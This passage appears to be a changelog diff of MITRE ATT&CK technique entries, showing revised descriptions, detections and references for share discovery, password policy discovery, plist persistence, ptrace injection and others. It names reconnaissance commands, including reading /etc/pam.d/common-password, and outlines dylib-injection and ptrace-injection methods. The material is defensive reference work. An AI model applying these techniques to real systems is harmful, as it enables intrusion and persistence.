New Description
t1Adversaries may look for folders and drives shared on remotet1Adversaries may look for folders and drives shared on remote
> systems as a means of identifying sources of information to> systems as a means of identifying sources of information to
> gather as a precursor for Collection and to identify potent> gather as a precursor for Collection and to identify potent
>ial systems of interest for Lateral Movement. Networks often>ial systems of interest for Lateral Movement. Networks often
> contain shared network drives and folders that enable users> contain shared network drives and folders that enable users
> to access file directories on various systems across a netw> to access file directories on various systems across a netw
>ork.   File sharing over a Windows network occurs over the S>ork.   File sharing over a Windows network occurs over the S
>MB protocol. (Citation: Wikipedia Shared Resource) (Citation>MB protocol. (Citation: Wikipedia Shared Resource) (Citation
>: TechNet Shared Folder) [Net](https://attack.mitre.org/soft>: TechNet Shared Folder) [Net](https://attack.mitre.org/soft
>ware/S0039) can be used to query a remote system for availab>ware/S0039) can be used to query a remote system for availab
>le shared drives using the <code>net view \\\\remotesystem</>le shared drives using the <code>net view \\\\remotesystem</
>code> command. It can also be used to query shared drives on>code> command. It can also be used to query shared drives on
> the local system using <code>net share</code>.> the local system using <code>net share</code>. For macOS, t
 >he <code>sharing -l</code> command lists all shared points u
 >sed for smb services.

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-12-29 19:07:11.154000+00:002021-10-13 18:10:57.185000+00:00
descriptionAdversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\\\remotesystem command. It can also be used to query shared drives on the local system using net share.Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\\\remotesystem command. It can also be used to query shared drives on the local system using net share. For macOS, the sharing -l command lists all shared points used for smb services.
x_mitre_version3.03.1

[T1003] OS Credential Dumping

Current version: 2.1

Version changed from: 2.0 → 2.1

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 14:15:25.186000+00:002021-10-15 19:55:01.922000+00:00
x_mitre_version2.02.1

[T1027] Obfuscated Files or Information

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-24 13:19:18.594000+00:002021-10-20 16:33:13.472000+00:00
x_mitre_data_sources[0]File: File ContentCommand: Command Execution
x_mitre_version1.11.2
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution
x_mitre_data_sourcesCommand: Command Execution

[T1588] Obtain Capabilities

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Malware Repository: Malware Metadata', 'Malware Repository: Malware Content', 'Certificate: Certificate Registration', 'Internet Scan: Response Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:15:21.193000+00:002021-10-18 12:26:22.831000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020) Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'FireEyeSupplyChain', 'description': 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to SunshopFireEye. Retrieved March 6, 2017.', 'url': 'https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop'}
external_references{'source_name': 'Analyzing CS Dec 2020', 'description': 'Maynier, E. (2020, December 20). Analyzing Cobalt Strike for Fun and Profit. Retrieved October 12, 2021.', 'url': 'https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/'}
external_references{'source_name': 'Splunk Kovar Certificates 2017', 'description': 'Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020.', 'url': 'https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html'}
external_references{'source_name': 'Recorded Future Beacon Certificates', 'description': 'Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying Rogue Cobalt Strike Servers. Retrieved October 16, 2020.', 'url': 'https://www.recordedfuture.com/cobalt-strike-servers/'}

[T1137] Office Application Startup

Current version: 1.3

Version changed from: 1.2 → 1.3

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-06-25 17:48:09.417000+00:002021-10-15 20:18:31.112000+00:00
x_mitre_contributors[0]Nick Carr, FireEyeNick Carr, Mandiant
x_mitre_version1.21.3

[T1137.001] Office Application Startup: Office Template Macros

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-06-25 17:48:08.916000+00:002021-08-16 21:27:10.873000+00:00
x_mitre_version1.01.1

[T1137.002] Office Application Startup: Office Test

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-20 15:27:51.559000+00:002021-08-16 21:35:17.618000+00:00
x_mitre_version1.01.1

[T1137.003] Office Application Startup: Outlook Forms

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-26 17:35:15.823000+00:002021-08-16 21:29:19.697000+00:00
x_mitre_version1.01.1

[T1137.004] Office Application Startup: Outlook Home Page

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-26 17:35:51.656000+00:002021-08-16 21:30:01.743000+00:00
x_mitre_version1.01.1

[T1137.005] Office Application Startup: Outlook Rules

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Microsoft Security']
values_changed
STIX FieldOld valueNew Value
modified2020-03-26 17:36:15.923000+00:002021-10-15 20:18:30.700000+00:00
external_references[3]['source_name']SensePost NotRulerPfammatter - Hidden Inbox Rules
external_references[3]['description']SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in Microsoft Exchange. Retrieved October 12, 2021.
external_references[3]['url']https://github.com/sensepost/notrulerhttps://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
x_mitre_detectionMicrosoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler) Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler) Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'SensePost NotRuler', 'description': 'SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.', 'url': 'https://github.com/sensepost/notruler'}

[T1201] Password Policy Discovery

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may attempt to access detailed information aboutt1Adversaries may attempt to access detailed information about
> the password policy used within an enterprise network. Pass> the password policy used within an enterprise network or cl
>word policies for networks are a way to enforce complex pass>oud environment. Password policies are a way to enforce comp
>words that are difficult to guess or crack through [Brute Fo>lex passwords that are difficult to guess or crack through [
>rce](https://attack.mitre.org/techniques/T1110). This would >Brute Force](https://attack.mitre.org/techniques/T1110). Thi
>help the adversary to create a list of common passwords and >information may help the adversary to create a list of com
>launch dictionary and/or brute force attacks which adheres t>mon passwords and launch dictionary and/or brute force attac
>o the policy (e.g. if the minimum password length should be >ks which adheres to the policy (e.g. if the minimum password
>8, then not trying passwords such as 'pass123'; not checking> length should be 8, then not trying passwords such as 'pass
> for more than 3-4 passwords per account if the lockout is s>123'; not checking for more than 3-4 passwords per account i
>et to 6 as to not lock out accounts).  Password policies can>f the lockout is set to 6 as to not lock out accounts).  Pas
> be set and discovered on Windows, Linux, and macOS systems >sword policies can be set and discovered on Windows, Linux, 
>via various command shell utilities such as <code>net accoun>and macOS systems via various command shell utilities such a
>ts (/domain)</code>, <code>Get-ADDefaultDomainPasswordPolicy>s <code>net accounts (/domain)</code>, <code>Get-ADDefaultDo
></code>, <code>chage -l <username></code>, <code>cat /etc/pa>mainPasswordPolicy</code>, <code>chage -l <username></code>,
>m.d/common-password</code>, and <code>pwpolicy getaccountpol> <code>cat /etc/pam.d/common-password</code>, and <code>pwpo
>icies</code>.(Citation: Superuser Linux Password Policies) (>licy getaccountpolicies</code> (Citation: Superuser Linux Pa
>Citation: Jamf User Password Policies)>ssword Policies) (Citation: Jamf User Password Policies).  P
 >assword policies can be discovered in cloud environments usi
 >ng available APIs such as <code>GetAccountPasswordPolicy</co
 >de> in AWS (Citation: AWS GetPasswordPolicy).

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-09-29 14:48:07.227000+00:002021-07-26 14:11:39.499000+00:00
descriptionAdversaries may attempt to access detailed information about the password policy used within an enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts). Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts). Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Password policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy).
x_mitre_detectionMonitor processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.Monitor logs and processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'AWS GetPasswordPolicy', 'description': 'Amazon Web Services. (n.d.). AWS API GetAccountPasswordPolicy. Retrieved June 8, 2021.', 'url': 'https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.html'}
x_mitre_contributorsRegina Elwell
x_mitre_contributorsIsif Ibrahima
x_mitre_data_sourcesUser Account: User Account Metadata
x_mitre_platformsIaaS

[T1069] Permission Groups Discovery

Current version: 2.4

Version changed from: 2.3 → 2.4

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-30 12:29:56.512000+00:002021-10-15 18:10:53.423000+00:00
x_mitre_detectionSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). Monitor container logs for commands and/or API calls related to listing permissions for pods and nodes, such as kubectl auth can-i.(Citation: K8s Authorization Overview)
x_mitre_version2.32.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'K8s Authorization Overview', 'description': 'Kubernetes. (n.d.). Authorization Overview. Retrieved June 24, 2021.', 'url': 'https://kubernetes.io/docs/reference/access-authn-authz/authorization/'}
x_mitre_contributorsDaniel Prizmant, Palo Alto Networks
x_mitre_contributorsYuval Avrahami, Palo Alto Networks
x_mitre_data_sourcesPod: Pod Metadata
x_mitre_platformsContainers

[T1566] Phishing

Current version: 2.2

Version changed from: 2.1 → 2.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 14:38:43.211000+00:002021-10-18 17:39:13.604000+00:00
x_mitre_version2.12.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Creation

[T1547.011] Boot or Logon Autostart Execution: Plist Modification

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may modify plist files to run a program during st1Adversaries can modify property list files (plist files) to 
>ystem boot or user login. Property list (plist) files contai>execute their code as part of establishing persistence. Plis
>n all of the information that macOS and OS X uses to configu>t files are used by macOS applications to store properties a
>re applications and services. These files are UTF-8 encoded >nd configuration settings for applications and services. App
>and formatted like XML documents via a series of keys surrou>lications use information plist files, <code>Info.plist</cod
>nded by < >. They detail when programs should execute, file >e>, to tell the operating system how to handle the applicati
>paths to the executables, program arguments, required OS per>on at runtime using structured metadata in the form of keys 
>missions, and many others. plists are located in certain loc>and values. Plist files are formatted in XML and based on Ap
>ations depending on their purpose such as <code>/Library/Pre>ple's Core Foundation DTD and can be saved in text or binary
>ferences</code> (which execute with elevated privileges) and> format.(Citation: fileinfo plist file description)   Advers
> <code>~/Library/Preferences</code> (which execute with a us>aries can modify paths to executed binaries, add command lin
>er's privileges).   Adversaries can modify plist files to ex>e arguments, and insert key/pair values to plist files in au
>ecute their code as part of establishing persistence. plists>to-run locations which execute upon user logon or system sta
> may also be used to elevate privileges since they may execu>rtup. Through modifying plist files in these locations, adve
>te in the context of another user.(Citation: Sofacy Komplex >rsaries can also execute a malicious dynamic library (dylib)
>Trojan)   A specific plist used for execution at login is <c> by adding a dictionary containing the <code>DYLD_INSERT_LIB
>ode>com.apple.loginitems.plist</code>.(Citation: Methods of >RARIES</code> key combined with a path to a malicious dylib 
>Mac Malware Persistence) Applications under this plist run u>under the <code>EnvironmentVariables</code> key in a plist f
>nder the logged in user's context, and will be started every>ile. Upon user logon, the plist is called for execution and 
> time the user logs in. Login items installed using the Serv>the malicious dylib is executed within the process space. Pe
>ice Management Framework are not visible in the System Prefe>rsistence can also be achieved by modifying the <code>LSEnvi
>rences and can only be removed by the application that creat>ronment</code> key in the application's <code>Info.plist</co
>ed them.(Citation: Adding Login Items) Users have direct con>de> file.(Citation: wardle artofmalware volume1)
>trol over login items installed using a shared file list whi 
>ch are also visible in System Preferences (Citation: Adding  
>Login Items). Some of these applications can open visible di 
>alogs to the user, but they don’t all have to since there is 
> an option to "hide" the window. If an adversary can registe 
>r their own login item or modified an existing one, then the 
>y can use it to execute their code for a persistence mechani 
>sm each time the user logs in (Citation: Malware Persistence 
> on OS X) (Citation: OSX.Dok Malware). The API method <code> 
> SMLoginItemSetEnabled</code> can be used to set Login Items 
>, but scripting languages like [AppleScript](https://attack. 
>mitre.org/techniques/T1059/002) can do this as well. (Citati 
>on: Adding Login Items) 

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-30 00:51:59.629000+00:002021-10-15 14:46:47.383000+00:00
descriptionAdversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as /Library/Preferences (which execute with elevated privileges) and ~/Library/Preferences (which execute with a user's privileges). Adversaries can modify plist files to execute their code as part of establishing persistence. plists may also be used to elevate privileges since they may execute in the context of another user.(Citation: Sofacy Komplex Trojan) A specific plist used for execution at login is com.apple.loginitems.plist.(Citation: Methods of Mac Malware Persistence) Applications under this plist run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them.(Citation: Adding Login Items) Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). Some of these applications can open visible dialogs to the user, but they don’t all have to since there is an option to "hide" the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method SMLoginItemSetEnabled can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1059/002) can do this as well. (Citation: Adding Login Items)Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, Info.plist, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description) Adversaries can modify paths to executed binaries, add command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon user logon or system startup. Through modifying plist files in these locations, adversaries can also execute a malicious dynamic library (dylib) by adding a dictionary containing the DYLD_INSERT_LIBRARIES key combined with a path to a malicious dylib under the EnvironmentVariables key in a plist file. Upon user logon, the plist is called for execution and the malicious dylib is executed within the process space. Persistence can also be achieved by modifying the LSEnvironment key in the application's Info.plist file.(Citation: wardle artofmalware volume1)
external_references[1]['source_name']Sofacy Komplex Trojanfileinfo plist file description
external_references[1]['description']Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.FileInfo.com team. (2019, November 26). .PLIST File Extension. Retrieved October 12, 2021.
external_references[1]['url']https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/https://fileinfo.com/extension/plist
external_references[2]['source_name']Methods of Mac Malware Persistencewardle artofmalware volume1
external_references[2]['description']Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021.
external_references[2]['url']https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdfhttps://taomm.org/vol1/pdfs.html
x_mitre_data_sources[0]File: File CreationService: Service Creation
x_mitre_detectionFile system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed. All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.Monitor for common command-line editors used to modify plist files located in auto-run locations, such as ~/LaunchAgents, ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm, and an application's Info.plist. Monitor for plist file modification immediately followed by code execution from ~/Library/Scripts and ~/Library/Preferences. Also, monitor for significant changes to any path pointers in a modified plist. Identify new services executed from plist modified in the previous user's session.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Adding Login Items', 'description': 'Apple. (2016, September 13). Adding Login Items. Retrieved July 11, 2017.', 'url': 'https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html'}
external_references{'source_name': 'Malware Persistence on OS X', 'description': 'Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.', 'url': 'https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf'}
external_references{'source_name': 'OSX.Dok Malware', 'description': 'Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.', 'url': 'https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/'}

[T1055.002] Process Injection: Portable Executable Injection

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-11-10 18:29:30.882000+00:002021-10-18 12:21:11.178000+00:00
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Modification

[T1059.001] Command and Scripting Interpreter: PowerShell

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-06-24 13:51:22.360000+00:002021-05-28 14:56:23.748000+00:00
x_mitre_version1.01.1

[T1055.012] Process Injection: Process Hollowing

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-11-10 18:29:31.031000+00:002021-10-18 12:30:14.640000+00:00
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Modification

[T1055] Process Injection

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 15:43:50.029000+00:002021-10-18 12:30:14.852000+00:00
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Modification

[T1055.008] Process Injection: Ptrace System Calls

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may inject malicious code into processes via ptrt1Adversaries may inject malicious code into processes via ptr
>ace (process trace) system calls in order to evade process-b>ace (process trace) system calls in order to evade process-b
>ased defenses as well as possibly elevate privileges. Ptrace>ased defenses as well as possibly elevate privileges. Ptrace
> system call injection is a method of executing arbitrary co> system call injection is a method of executing arbitrary co
>de in the address space of a separate live process.   Ptrace>de in the address space of a separate live process.   Ptrace
> system call injection involves attaching to and modifying a> system call injection involves attaching to and modifying a
> running process. The ptrace system call enables a debugging> running process. The ptrace system call enables a debugging
> process to observe and control another process (and each in> process to observe and control another process (and each in
>dividual thread), including changing memory and register val>dividual thread), including changing memory and register val
>ues.(Citation: PTRACE man) Ptrace system call injection is c>ues.(Citation: PTRACE man) Ptrace system call injection is c
>ommonly performed by writing arbitrary code into a running p>ommonly performed by writing arbitrary code into a running p
>rocess (ex: <code>malloc</code>) then invoking that memory w>rocess (ex: <code>malloc</code>) then invoking that memory w
>ith <code>PTRACE_SETREGS</code> to set the register containi>ith <code>PTRACE_SETREGS</code> to set the register containi
>ng the next instruction to execute. Ptrace system call injec>ng the next instruction to execute. Ptrace system call injec
>tion can also be done with <code>PTRACE_POKETEXT</code>/<cod>tion can also be done with <code>PTRACE_POKETEXT</code>/<cod
>e>PTRACE_POKEDATA</code>, which copy data to a specific addr>e>PTRACE_POKEDATA</code>, which copy data to a specific addr
>ess in the target processes’ memory (ex: the current address>ess in the target processes’ memory (ex: the current address
> of the next instruction). (Citation: PTRACE man)(Citation: > of the next instruction). (Citation: PTRACE man)(Citation: 
>Medium Ptrace JUL 2018)   Ptrace system call injection may n>Medium Ptrace JUL 2018)   Ptrace system call injection may n
>ot be possible targeting processes with high-privileges, and>ot be possible targeting processes that are non-child proces
> on some system those that are non-child processes.(Citation>ses and/or have higher-privileges.(Citation: BH Linux Inject
>: BH Linux Inject)   Running code in the context of another >)   Running code in the context of another process may allow
>process may allow access to the process's memory, system/net> access to the process's memory, system/network resources, a
>work resources, and possibly elevated privileges. Execution >nd possibly elevated privileges. Execution via ptrace system
>via ptrace system call injection may also evade detection fr> call injection may also evade detection from security produ
>om security products since the execution is masked under a l>cts since the execution is masked under a legitimate process
>egitimate process. >

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-06-20 22:24:56.734000+00:002021-10-18 12:26:31.766000+00:00
descriptionAdversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: malloc) then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) Ptrace system call injection may not be possible targeting processes with high-privileges, and on some system those that are non-child processes.(Citation: BH Linux Inject) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: malloc) then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) Ptrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Modification

[T1216.001] Signed Script Proxy Execution: PubPrn

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may use the trusted PubPrn script to proxy execut1Adversaries may use PubPrn to proxy execution of malicious r
>tion of malicious files. This behavior may bypass signature >emote files. PubPrn.vbs is a [Visual Basic](https://attack.m
>validation restrictions and application control solutions th>itre.org/techniques/T1059/005) script that publishes a print
>at do not account for use of these scripts.  <code>PubPrn.vb>er to Active Directory Domain Services. The script is signed
>s</code> is a Visual Basic script that publishes a printer t> by Microsoft and is commonly executed through the [Windows 
